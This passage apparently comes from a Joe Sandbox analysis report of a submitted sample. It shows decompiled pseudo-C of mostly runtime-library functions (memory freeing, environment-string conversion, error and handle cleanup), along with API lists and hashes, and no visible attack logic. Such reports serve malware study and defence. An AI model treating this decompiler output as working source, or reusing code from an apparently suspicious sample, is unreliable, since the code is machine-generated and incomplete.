					_t29 =  *0xa3e668; // 0xcba178b4
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00A27F89( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00A23429(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00A23429(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00A23429(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00A2BA23(_t56);
						_t40 = E00A287FE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00A2BA23(_t56);
						E00A287FE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xa3e668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                                        0x00a280c8
                                                        0x00a280d2
                                                        0x00a280d6
                                                        0x00a280d8
                                                        0x00a280dc
                                                        0x00a280e6
                                                        0x00a280f7
                                                        0x00a280fc
                                                        0x00a280fe
                                                        0x00a28100
                                                        0x00a28102
                                                        0x00a28104
                                                        0x00a28108
                                                        0x00a281c2
                                                        0x00a281d0
                                                        0x00a281d2
                                                        0x00a281d7
                                                        0x00a281de
                                                        0x00a281e0
                                                        0x00a281ee
                                                        0x00a281fd
                                                        0x00a28200
                                                        0x00a28202
                                                        0x00000000
                                                        0x00a28203
                                                        0x00a28110
                                                        0x00a28115
                                                        0x00a2811a
                                                        0x00a2811c
                                                        0x00a2811c
                                                        0x00a2811e
                                                        0x00a28123
                                                        0x00a28127
                                                        0x00a28127
                                                        0x00a2812a
                                                        0x00a28149
                                                        0x00a28149
                                                        0x00a2814b
                                                        0x00a2814e
                                                        0x00a28157
                                                        0x00a2815a
                                                        0x00a2815f
                                                        0x00a28162
                                                        0x00a28167
                                                        0x00000000
                                                        0x00000000
                                                        0x00a28169
                                                        0x00000000
                                                        0x00a2812c
                                                        0x00a2812c
                                                        0x00a2812e
                                                        0x00a28137
                                                        0x00a2813a
                                                        0x00a2813f
                                                        0x00a28142
                                                        0x00a28147
                                                        0x00a28171
                                                        0x00a28174
                                                        0x00a28176
                                                        0x00a28179
                                                        0x00a28181
                                                        0x00a28187
                                                        0x00a2818e
                                                        0x00a28190
                                                        0x00a28198
                                                        0x00a281a7
                                                        0x00a281ab
                                                        0x00a281ad
                                                        0x00a281b0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a281b2
                                                        0x00a281b5
                                                        0x00a281b7
                                                        0x00a281b7
                                                        0x00a281b8
                                                        0x00a281ba
                                                        0x00a281bd
                                                        0x00000000
                                                        0x00a281b7
                                                        0x00000000
                                                        0x00a28147
                                                        0x00a2812a
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: fc52e0bfce5787c7ccfb7f089d202c402c2fc12c28fb903285d9e2d35422effa
                                                        • Instruction ID: 2be43b6992ebe4aff7de836744f228be1f129debfeb7f904a7f5814f863424cb
                                                        • Opcode Fuzzy Hash: fc52e0bfce5787c7ccfb7f089d202c402c2fc12c28fb903285d9e2d35422effa
                                                        • Instruction Fuzzy Hash: 1341E636A012209FCB14DF7CE981A59B3B1EF85710B1545B9F515EB391DB34AD02CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2B9A0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E00A2B9A0() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00A2B969(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00A28838(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00A287FE(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                                                        0x00a2b9af
                                                        0x00a2b9b5
                                                        0x00a2ba0d
                                                        0x00a2ba0d
                                                        0x00a2b9b7
                                                        0x00a2b9b8
                                                        0x00a2b9bd
                                                        0x00a2b9c6
                                                        0x00a2b9cc
                                                        0x00a2b9d2
                                                        0x00a2b9d7
                                                        0x00000000
                                                        0x00a2b9d9
                                                        0x00a2b9df
                                                        0x00a2b9e4
                                                        0x00a2ba02
                                                        0x00a2b9fc
                                                        0x00a2b9fc
                                                        0x00a2b9fe
                                                        0x00a2b9fe
                                                        0x00a2ba05
                                                        0x00a2ba0a
                                                        0x00a2b9d7
                                                        0x00a2ba11
                                                        0x00a2ba14
                                                        0x00a2ba14
                                                        0x00a2ba22

                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00A2B9A9
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A2B9CC
                                                          • Part of subcall function 00A28838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23CF6,?,0000015D,?,?,?,?,00A251D2,000000FF,00000000,?,?), ref: 00A2886A
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A2B9F2
                                                        • _free.LIBCMT ref: 00A2BA05
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A2BA14
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: 709016e3728ca0a6096a7ecc094c1b40d10de95ebe2ff6a0e9800cebe17fdb5b
                                                        • Instruction ID: 6fdf52f5972adf3ec9a3b200d41de7957cbbe0dde3cc33e6421207b10f2aaea7
                                                        • Opcode Fuzzy Hash: 709016e3728ca0a6096a7ecc094c1b40d10de95ebe2ff6a0e9800cebe17fdb5b
                                                        • Instruction Fuzzy Hash: 49015E73A162657F26219BAE7C89D7B7B6DDAC6BE17140139F904D6100EF658D0281B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A29339 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A29339(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0xa3e6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00A288C9(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00A2A981(_t13, _t17, __eflags,  *0xa3e6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00A2911B(_t13, _t16, 0xa61290);
							E00A287FE(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00A287FE();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00A2A92B(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                                                        0x00a29339
                                                        0x00a29344
                                                        0x00a29346
                                                        0x00a29348
                                                        0x00a2934d
                                                        0x00a29350
                                                        0x00a2935e
                                                        0x00a2936a
                                                        0x00a2936d
                                                        0x00a29370
                                                        0x00a29382
                                                        0x00a29387
                                                        0x00a29389
                                                        0x00a29394
                                                        0x00a2939a
                                                        0x00a293a2
                                                        0x00a293a4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2938b
                                                        0x00a2938b
                                                        0x00000000
                                                        0x00a2938b
                                                        0x00a29372
                                                        0x00a29372
                                                        0x00a29373
                                                        0x00a29373
                                                        0x00a293a6
                                                        0x00a293a7
                                                        0x00a293a7
                                                        0x00a29352
                                                        0x00a29358
                                                        0x00a2935c
                                                        0x00a293af
                                                        0x00a293b0
                                                        0x00a293b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2935c
                                                        0x00a293bd

                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,00A28C7F,00A2891B,?,00A292E3,00000001,00000364,?,00A23B5F,?,?,00A40F50), ref: 00A2933E
                                                        • _free.LIBCMT ref: 00A29373
                                                        • _free.LIBCMT ref: 00A2939A
                                                        • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A293A7
                                                        • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A293B0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: d3239ec2794a4fef84939a7d58f858745e1f34aee5e01a4f5adf6758932ff87f
                                                        • Instruction ID: c856d9c2b06555b940f637eb368b91801f27c149a35e50d55110c8b844d239c2
                                                        • Opcode Fuzzy Hash: d3239ec2794a4fef84939a7d58f858745e1f34aee5e01a4f5adf6758932ff87f
                                                        • Instruction Fuzzy Hash: CE0144335096203B8316E37E7E86AAB2669ABD1BB0F31013CF506DA2D1EF3488021020
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10A36 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A10A36(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00A31F81);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00A10D11(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E00A10B29(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











                                                        0x00a10a36
                                                        0x00a10a3f
                                                        0x00a10a41
                                                        0x00a10a46
                                                        0x00a10a47
                                                        0x00a10a51
                                                        0x00a10a53
                                                        0x00a10a58
                                                        0x00a10a5a
                                                        0x00a10a6a
                                                        0x00a10a76
                                                        0x00a10a78
                                                        0x00a10a7b
                                                        0x00a10a7d
                                                        0x00a10a84
                                                        0x00a10a8a
                                                        0x00a10a8b
                                                        0x00a10a8e
                                                        0x00a10a7b
                                                        0x00a10a9d
                                                        0x00a10aa9
                                                        0x00a10ab5
                                                        0x00a10ac0
                                                        0x00a10acb

                                                        APIs
                                                          • Part of subcall function 00A10D11: ResetEvent.KERNEL32(?), ref: 00A10D23
                                                          • Part of subcall function 00A10D11: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A10D37
                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A10A6A
                                                        • CloseHandle.KERNEL32(?,?), ref: 00A10A84
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 00A10A9D
                                                        • CloseHandle.KERNEL32(?), ref: 00A10AA9
                                                        • CloseHandle.KERNEL32(?), ref: 00A10AB5
                                                          • Part of subcall function 00A10B29: WaitForSingleObject.KERNEL32(?,000000FF,00A10C48,?,?,00A10CBF,?,?,?,?,?,00A10CA9), ref: 00A10B2F
                                                          • Part of subcall function 00A10B29: GetLastError.KERNEL32(?,?,00A10CBF,?,?,?,?,?,00A10CA9), ref: 00A10B3B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                        • String ID:
                                                        • API String ID: 1868215902-0
                                                        • Opcode ID: b0d45d1e8c333ece739d6068a340e6295e4e278f2af96d9a50f7ea30f37cc9f6
                                                        • Instruction ID: 2b692bc158598949a3d23e146c1f121bd50182b0128718f42b9c30e0eacfee7a
                                                        • Opcode Fuzzy Hash: b0d45d1e8c333ece739d6068a340e6295e4e278f2af96d9a50f7ea30f37cc9f6
                                                        • Instruction Fuzzy Hash: 6D01F572504B04EFCB21DB65DD84FC6BBE9FF49710F004519F25A42160CBB52A85CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2C26F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A2C26F(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xa3ed50; // 0xa3ed44
					if(_t23 != 0) {
						E00A287FE(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xa3ed54; // 0xa61704
					if(_t24 != 0) {
						E00A287FE(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xa3ed58; // 0xa61704
					if(_t25 != 0) {
						E00A287FE(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xa3ed80; // 0xa3ed48
					if(_t26 != 0) {
						E00A287FE(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xa3ed84; // 0xa61708
					if(_t27 != 0) {
						return E00A287FE(_t6);
					}
				}
				return _t6;
			}










                                                        0x00a2c275
                                                        0x00a2c27a
                                                        0x00a2c27e
                                                        0x00a2c284
                                                        0x00a2c287
                                                        0x00a2c28c
                                                        0x00a2c290
                                                        0x00a2c296
                                                        0x00a2c299
                                                        0x00a2c29e
                                                        0x00a2c2a2
                                                        0x00a2c2a8
                                                        0x00a2c2ab
                                                        0x00a2c2b0
                                                        0x00a2c2b4
                                                        0x00a2c2ba
                                                        0x00a2c2bd
                                                        0x00a2c2c2
                                                        0x00a2c2c3
                                                        0x00a2c2c6
                                                        0x00a2c2cc
                                                        0x00000000
                                                        0x00a2c2d4
                                                        0x00a2c2cc
                                                        0x00a2c2d7

                                                        APIs
                                                        • _free.LIBCMT ref: 00A2C287
                                                          • Part of subcall function 00A287FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?), ref: 00A28814
                                                          • Part of subcall function 00A287FE: GetLastError.KERNEL32(?,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?,?), ref: 00A28826
                                                        • _free.LIBCMT ref: 00A2C299
                                                        • _free.LIBCMT ref: 00A2C2AB
                                                        • _free.LIBCMT ref: 00A2C2BD
                                                        • _free.LIBCMT ref: 00A2C2CF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 4d738026763298aa2ddbb9beeafd109a9cecade73ed60845ebd5b953b23cfaf4
                                                        • Instruction ID: af2e6e951689e9366bdf1e0487f78e7970ffda98bfb229537c819fb2a08e6d94
                                                        • Opcode Fuzzy Hash: 4d738026763298aa2ddbb9beeafd109a9cecade73ed60845ebd5b953b23cfaf4
                                                        • Instruction Fuzzy Hash: 28F0F973505220EBC620EBEDFEC6D9A73D9BA107607640825F00DDB591CF28FC808B68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A28350 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E00A28350(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xa3ed40; // 0x32e23a8
					if(_t7 != 0xa3eb20) {
						E00A287FE(_t7);
						 *0xa3ed40 = 0xa3eb20;
					}
				}
				E00A287FE( *0xa61288);
				 *0xa61288 = 0;
				E00A287FE( *0xa6128c);
				 *0xa6128c = 0;
				E00A287FE( *0xa616d8);
				 *0xa616d8 = 0;
				E00A287FE( *0xa616dc);
				 *0xa616dc = 0;
				return 1;
			}




                                                        0x00a28359
                                                        0x00a2835d
                                                        0x00a2835f
                                                        0x00a2836b
                                                        0x00a2836e
                                                        0x00a28374
                                                        0x00a28374
                                                        0x00a2836b
                                                        0x00a28380
                                                        0x00a2838d
                                                        0x00a28393
                                                        0x00a2839e
                                                        0x00a283a4
                                                        0x00a283af
                                                        0x00a283b5
                                                        0x00a283bd
                                                        0x00a283c6

                                                        APIs
                                                        • _free.LIBCMT ref: 00A2836E
                                                          • Part of subcall function 00A287FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?), ref: 00A28814
                                                          • Part of subcall function 00A287FE: GetLastError.KERNEL32(?,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?,?), ref: 00A28826
                                                        • _free.LIBCMT ref: 00A28380
                                                        • _free.LIBCMT ref: 00A28393
                                                        • _free.LIBCMT ref: 00A283A4
                                                        • _free.LIBCMT ref: 00A283B5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 378415d6f761adef8310ee0dd304deac221f157fdd3bdacea2a0484673105395
                                                        • Instruction ID: 2ee87b7468e807929ca6158d4f17227ba3313c718ef41d5269f5cfc142993b34
                                                        • Opcode Fuzzy Hash: 378415d6f761adef8310ee0dd304deac221f157fdd3bdacea2a0484673105395
                                                        • Instruction Fuzzy Hash: E2F03A798021349BC751EFAAFD525483FB5F724B2031C0A2AF4059B2B0CF780853AF85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A11107 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 29%
                                                        			E00A11107(intOrPtr* __ecx) {
				char _v516;
				char _v5636;
				signed int _t32;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t59;
				void* _t60;

				_t50 = __ecx;
				E00A1E630();
				_t54 = __ecx;
				_t32 =  *(__ecx + 0x48);
				_t59 = _t32 - 0x72;
				if(_t59 > 0) {
					__eflags = _t32 - 0x80;
					if(_t32 == 0x80) {
						E00A1CFE4();
						__eflags =  *(_t54 + 4);
						if( *(_t54 + 4) == 0) {
							E00A10131( &_v5636, E00A0E0AC(_t50, 0xc9), 0xa00);
						} else {
							E00A03F8F( &_v5636, 0xa00, E00A0E0AC(_t50, 0xca),  *(_t54 + 4));
						}
						_t32 = E00A1A195( *0xa4844c,  &_v5636, E00A0E0AC(_t50, 0x96), 0);
					}
					L64:
					return _t32;
				}
				if(_t59 == 0) {
					_push(0x456);
					L38:
					_push(E00A0E0AC(_t50));
					_push( *_t54);
					L19:
					_t32 = E00A1B118();
					L11:
					goto L64;
				}
				_t60 = _t32 - 0x16;
				if(_t60 > 0) {
					__eflags = _t32 - 0x38;
					if(__eflags > 0) {
						_t43 = _t32 - 0x39;
						__eflags = _t43;
						if(_t43 == 0) {
							_push(0x8c);
							goto L38;
						}
						_t44 = _t43 - 1;
						__eflags = _t44;
						if(_t44 == 0) {
							_push(0x6f);
							goto L38;
						}
						_t45 = _t44 - 1;
						__eflags = _t45;
						if(_t45 == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							_push(0x406);
							L13:
							_push(E00A0E0AC(_t50));
							_push( *_t54);
							L8:
							_t32 = E00A1B118();
							goto L64;
						}
						_t47 = _t45 - 9;
						__eflags = _t47;
						if(_t47 == 0) {
							_push(0x343);
							goto L38;
						}
						_t32 = _t47 - 1;
						__eflags = _t32;
						if(_t32 != 0) {
							goto L64;
						}
						_push(0x86);
						goto L38;
					}
					if(__eflags == 0) {
						_push(0x67);
						goto L38;
					}
					_t32 = _t32 - 0x17;
					__eflags = _t32 - 0xb;
					if(_t32 > 0xb) {
						goto L64;
					}
					switch( *((intOrPtr*)(_t32 * 4 +  &M00A11417))) {
						case 0:
							_push(0xde);
							goto L18;
						case 1:
							_push(0xe1);
							L18:
							_push(E00A0E0AC(_t50));
							_push(0);
							goto L19;
						case 2:
							_push(0xb4);
							goto L38;
						case 3:
							_push(0x69);
							goto L38;
						case 4:
							_push(0x6a);
							goto L38;
						case 5:
							_push( *((intOrPtr*)(__esi + 4)));
							_push(0x68);
							goto L13;
						case 6:
							_push(0x46f);
							goto L38;
						case 7:
							_push(0x470);
							goto L38;
						case 8:
							_push( *((intOrPtr*)(__esi + 4)));
							_push(0x471);
							goto L13;
						case 9:
							goto L64;
						case 0xa:
							_push( *((intOrPtr*)(__esi + 4)));
							_push(0x71);
							goto L13;
						case 0xb:
							E00A0E0AC(__ecx, 0xc8) =  &_v516;
							__eax = E00A03F8F( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
							_push( *((intOrPtr*)(__esi + 8)));
							__eax =  &_v516;
							_push( &_v516);
							__eax = E00A1B118( *__esi, L"%s: %s");
							goto L64;
					}
				}
				if(_t60 == 0) {
					_push( *__ecx);
					_push(0xdd);
					L23:
					E00A0E0AC(_t50);
					L7:
					_push(0);
					goto L8;
				}
				if(_t32 > 0x15) {
					goto L64;
				}
				switch( *((intOrPtr*)(_t32 * 4 +  &M00A113BF))) {
					case 0:
						_push( *__esi);
						_push(L"%ls");
						_push(">");
						goto L8;
					case 1:
						_push( *__ecx);
						_push(L"%ls");
						goto L7;
					case 2:
						_push(0);
						__eax = E00A1A888();
						goto L11;
					case 3:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x7b);
						goto L13;
					case 4:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x7a);
						goto L13;
					case 5:
						_push( *((intOrPtr*)(__esi + 4)));
